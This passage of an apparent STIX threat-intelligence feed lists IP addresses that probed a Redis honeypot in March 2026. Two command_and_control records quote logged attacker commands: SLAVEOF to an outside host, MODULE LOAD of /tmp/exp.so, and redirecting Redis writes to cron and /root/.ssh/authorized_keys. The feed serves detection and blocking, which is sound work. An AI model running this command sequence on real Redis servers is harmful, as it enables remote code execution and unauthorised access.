      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--562aabdf-6d0c-4843-867a-35fca7f60d92",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.185.132.165']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T02:25:07.000Z",
      "valid_until": "2026-04-15T02:25:06.000Z"
    },
    {
      "created": "2026-03-14T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=SC; asn=49870; asn_org=Alsycon B.V.; redis_cmd_hits=0",
      "id": "indicator--4b559977-fe68-4bbd-9181-f0c09f735b33",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '160.119.76.43']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T02:25:07.000Z",
      "valid_until": "2026-04-15T02:25:06.000Z"
    },
    {
      "created": "2026-03-14T03:25:23.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--66a59965-e50f-4a85-a387-6b017e93829c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T03:25:23.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.198.190.148']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T03:25:23.000Z",
      "valid_until": "2026-04-15T03:25:06.000Z"
    },
    {
      "created": "2026-03-14T03:25:23.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--4b8ffa9d-c13d-447a-ab83-6ce24199d732",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T03:25:23.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.20.198.190']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T03:25:23.000Z",
      "valid_until": "2026-04-15T03:25:06.000Z"
    },
    {
      "created": "2026-03-14T04:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--9d18e0b1-1409-4b74-9da5-97d379dfc212",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T04:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.175.198.186']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T04:25:08.000Z",
      "valid_until": "2026-04-15T04:25:06.000Z"
    },
    {
      "created": "2026-03-14T06:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--edfe4c58-433c-4cd2-ab1d-69c0ef2a7f4f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T06:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.164']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T06:25:08.000Z",
      "valid_until": "2026-04-15T06:25:06.000Z"
    },
    {
      "created": "2026-03-14T06:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--c7fa9a61-1f84-4776-8e37-4de1ed075ec5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T06:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.167']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T06:25:08.000Z",
      "valid_until": "2026-04-15T06:25:06.000Z"
    },
    {
      "created": "2026-03-14T09:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=NL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--adc4f167-6b12-403f-b293-9c4de55e5832",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T09:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.54.218.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T09:25:14.000Z",
      "valid_until": "2026-04-15T09:25:12.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--b5a2425e-d06f-49c5-88e0-a5083f5e5bfc",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '121.196.228.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a01a0e06-dc75-42fa-8e27-cc96065c09f6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.173.242']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--d25ef42f-e74a-465a-beed-79555082ef03",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '183.56.183.136']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--c56c651d-fbc7-4369-8be5-c5a178a74944",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '184.105.247.196']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--dc4be294-c8f2-49da-8c76-ec63028c29df",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '184.105.247.208']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T10:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--6f7f28b1-39bf-4660-8b8f-018157f2d68e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T10:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.140.220.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T10:25:07.000Z",
      "valid_until": "2026-04-15T10:25:06.000Z"
    },
    {
      "created": "2026-03-14T11:25:19.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--f773ea25-8299-4b9c-9a86-33ec7be4874c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T11:25:19.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.92.97.77']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T11:25:19.000Z",
      "valid_until": "2026-04-15T11:25:18.000Z"
    },
    {
      "created": "2026-03-14T13:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--0dbfbfaf-552d-4800-96c8-e214de8b37d8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T13:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.144.239.72']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T13:25:14.000Z",
      "valid_until": "2026-04-15T13:25:12.000Z"
    },
    {
      "created": "2026-03-14T15:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--a74d0342-24ca-4af1-a5be-637797dd8680",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T15:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.236.35.120']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T15:25:14.000Z",
      "valid_until": "2026-04-15T15:25:13.000Z"
    },
    {
      "created": "2026-03-14T15:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0",
      "id": "indicator--40b0e6ad-060b-4d0b-8532-a43648859ec8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T15:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.77']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T15:25:14.000Z",
      "valid_until": "2026-04-15T15:25:13.000Z"
    },
    {
      "created": "2026-03-14T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--1acfd67c-f4ea-43ca-9a29-3c62ac894f8a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T16:25:13.000Z",
      "valid_until": "2026-04-15T16:25:12.000Z"
    },
    {
      "created": "2026-03-14T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--12d9962d-9852-41c8-9ef1-4aac7de50aba",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.20']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T16:25:13.000Z",
      "valid_until": "2026-04-15T16:25:12.000Z"
    },
    {
      "created": "2026-03-14T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=RO; asn=42397; asn_org=Bunea TELECOM SRL; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--6169aa37-4c72-4f68-b5d5-88ff2f18837b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.29.13.64']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T17:25:13.000Z",
      "valid_until": "2026-04-15T17:25:12.000Z"
    },
    {
      "created": "2026-03-14T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=39; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmds=SLAVEOF NO ONE,config set dir /var/spool/cron/,MODULE LOAD /tmp/exp.so,SLAVEOF 107.174.52.27 60146,MODULE UNLOAD system; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--593336e1-367b-428e-98e3-05cf94b93fb8",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-14T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.86.176.209']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T17:25:13.000Z",
      "valid_until": "2026-04-15T17:25:12.000Z"
    },
    {
      "created": "2026-03-14T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--b03c6c6c-3878-4c0d-84ea-572f25c7340e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.29.192.72']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T18:25:13.000Z",
      "valid_until": "2026-04-15T18:25:12.000Z"
    },
    {
      "created": "2026-03-14T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--e7ba073d-3695-4283-8e39-dc1bfbd91e85",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '44.220.188.65']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T18:25:13.000Z",
      "valid_until": "2026-04-15T18:25:12.000Z"
    },
    {
      "created": "2026-03-14T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=532; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Misc activity; redis_cmds=config set dir .,SLAVEOF 114.215.193.12 60124,config set dir /root/.ssh/,CONFIG SET dir /tmp/,config set dbfilename authorized_keys; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--b0b8dfe8-405b-4dee-8fb7-9d65401d41e9",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-14T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.137.156.127']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T20:25:13.000Z",
      "valid_until": "2026-04-15T20:25:11.000Z"
    },
    {
      "created": "2026-03-14T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0",
      "id": "indicator--7ed60638-b67c-4ca9-8819-0cf5f40cbcea",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '86.54.31.40']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T21:25:13.000Z",
      "valid_until": "2026-04-15T21:25:12.000Z"
    },
    {
      "created": "2026-03-14T22:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=328364; asn_org=Host-Africa-AS; redis_cmd_hits=0",
      "id": "indicator--c782a199-1f8f-445b-b2b1-1848e0d7e0ba",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T22:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '102.130.127.216']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T22:25:14.000Z",
      "valid_until": "2026-04-15T22:25:12.000Z"
    },
    {
      "created": "2026-03-14T22:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=RO; asn=47890; asn_org=Unmanaged Ltd; redis_cmd_hits=0",
      "id": "indicator--1a7280f4-d8af-48a0-b413-6bf1e8fbdb1a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T22:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '80.94.92.17']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T22:25:14.000Z",
      "valid_until": "2026-04-15T22:25:12.000Z"
    },
    {
      "created": "2026-03-14T23:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--8ac2642c-ed00-408c-9fd8-e4b55db4e8e3",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T23:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.81.226']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T23:25:03.000Z",
      "valid_until": "2026-04-15T23:25:01.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--86eeb655-ce58-4e6d-a3d2-6080523492e1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '138.197.44.169']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=NL; asn=212238; asn_org=Datacamp Limited; redis_cmd_hits=0",
      "id": "indicator--bf1f142a-da69-45c8-94fa-7b3b08b22c1e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '158.173.21.216']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--e29e101d-fdf4-4203-8e33-c5ae2856157f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.122']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--33ba5af0-7402-48d9-8871-9505fe0bdf01",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.87.195.41']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--070186f1-1bd0-437d-8010-85dafb1fab0c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.202']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T00:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=BG; asn=50360; asn_org=Tamatiya EOOD; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--4f010ccb-917e-4d42-acb4-bded6d83fd2d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T00:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '79.124.58.146']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T00:25:14.000Z",
      "valid_until": "2026-04-16T00:25:12.000Z"
    },
    {
      "created": "2026-03-15T01:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--2b7ed60f-2c04-44fc-98ff-0c52b7b9c2f6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T01:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.115']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T01:25:14.000Z",
      "valid_until": "2026-04-16T01:25:12.000Z"
    },
    {
      "created": "2026-03-15T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--2e463009-78ab-4d1d-9eba-3036be660b10",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.130.47.11']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T02:25:13.000Z",
      "valid_until": "2026-04-16T02:25:12.000Z"
    },
    {
      "created": "2026-03-15T06:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--1fe2666a-9fff-4e65-aea4-7b3264ebba14",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-15T06:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.105.202.192']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-15T06:25:07.000Z",
      "valid_until": "2026-04-16T06:25:06.000Z"
    },
    {
      "created": "2026-03-15T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--8e88bc1c-df84-485e-8776-ab4de5f3f281",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-15T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '161.35.58.239']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
